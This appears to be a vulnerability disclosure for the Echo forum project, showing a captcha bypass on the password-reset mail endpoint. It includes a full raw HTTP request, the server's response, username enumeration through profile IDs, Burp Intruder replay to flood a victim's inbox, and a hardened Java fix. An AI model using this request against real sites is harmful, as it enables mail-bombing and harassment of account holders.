Echo

Project Repository: https://github.com/Veal98/Echo

First, register a victim account named Pax, and set its email to 2472373483@qq.com. During the attack we only need to know the victim's username, which can be read from the /user/profile/id route, where id can be 1, 2, 3, etc.

Next, register another account named Pax1 with any email address; this one is not important.

What is important is configuring the project’s email settings properly:

```properties
spring.mail.host = smtp.sina.com.cn
spring.mail.port = 465
spring.mail.username = xxxxxxxxxxxx@sina.com.cn
spring.mail.password = xxxxxxxxxxxxxx
spring.mail.protocol = smtp
spring.mail.properties.mail.smtp.ssl.enable = true
```

This ensures that the email functionality works correctly.

Log in first, then craft a request to send to the /sendEmailCodeForResetPwd endpoint as shown below:

```http
POST /sendEmailCodeForResetPwd HTTP/1.1
Host: localhost:8081
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8081/login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Phpstorm-63ee3e42=f81c2361-2176-493f-9d51-0d11580e937b; ticket=20b45e36b4f24f49bc5c287b06989f8d; JSESSIONID=0B10132A1A382BCAFB06F00F96BE7B8A; kaptchaOwner=1bcb6ff9ec4a4a37a5fa37d97b53702c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

kaptcha=1bcb6ff9ec4a4a37a5fa37d97b53702c&username=Pax
```

Response:

```http
HTTP/1.1 200 
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: SAMEORIGIN
Content-Type: application/json;charset=UTF-8
Date: Fri, 23 May 2025 03:32:16 GMT
Content-Length: 119

{"errMsg":"图片验证码过期","msg":"已经往您的邮箱发送了一封验证码邮件, 请查收!","status":"0"}
```

**Screenshot of successful result:**

Then place the request in Burp Suite's Intruder module for the attack.

**Screenshot of successful result:**
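The response body above carries both an expired-captcha error and a "verification mail sent" message, which is consistent with a handler that records the captcha failure but keeps going. The sketch below is an added example, not code from the Echo repository; `ResetCodeSender`, `CaptchaStore`, `MailSender` and `lookup` are assumed names. It places that fall-through pattern next to a version that treats the captcha check as a hard gate.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.UUID;

public class ResetCodeSender {
    // Assumed stand-ins for the captcha cache and the mail client; not Echo's own types.
    interface CaptchaStore { String lookup(String kaptchaOwner); }
    interface MailSender { void send(String username, String code); }

    private final CaptchaStore captchas;
    private final MailSender mail;

    public ResetCodeSender(CaptchaStore captchas, MailSender mail) {
        this.captchas = captchas;
        this.mail = mail;
    }

    // Flawed pattern: a failed captcha check only fills errMsg, then execution falls through.
    public Map<String, String> sendFlawed(String kaptchaOwner, String kaptcha, String username) {
        Map<String, String> resp = new HashMap<>();
        String expected = captchas.lookup(kaptchaOwner);
        if (expected == null) {
            resp.put("errMsg", "captcha expired");
        } else if (!expected.equalsIgnoreCase(kaptcha)) {
            resp.put("errMsg", "captcha wrong");
        }
        mail.send(username, newCode());                 // reached even when errMsg is set
        resp.put("msg", "verification mail sent");
        resp.put("status", "0");
        return resp;
    }

    // Hardened pattern: on any captcha failure we return before a code is generated
    // or mailed, so a missing or stale captcha can never trigger a reset mail.
    public Map<String, String> sendHardened(String kaptchaOwner, String kaptcha, String username) {
        Map<String, String> resp = new HashMap<>();
        String expected = captchas.lookup(kaptchaOwner);
        if (expected == null || !expected.equalsIgnoreCase(kaptcha)) {
            resp.put("errMsg", expected == null ? "captcha expired" : "captcha wrong");
            resp.put("status", "1");
            return resp;
        }
        mail.send(username, newCode());
        resp.put("msg", "verification mail sent");
        resp.put("status", "0");
        return resp;
    }

    private static String newCode() { return UUID.randomUUID().toString().substring(0, 6); }
}
```

A quick regression check for this class of bug is to replay the request with the `kaptcha` field removed or stale and confirm that no mail leaves the server and that `status` is non-zero.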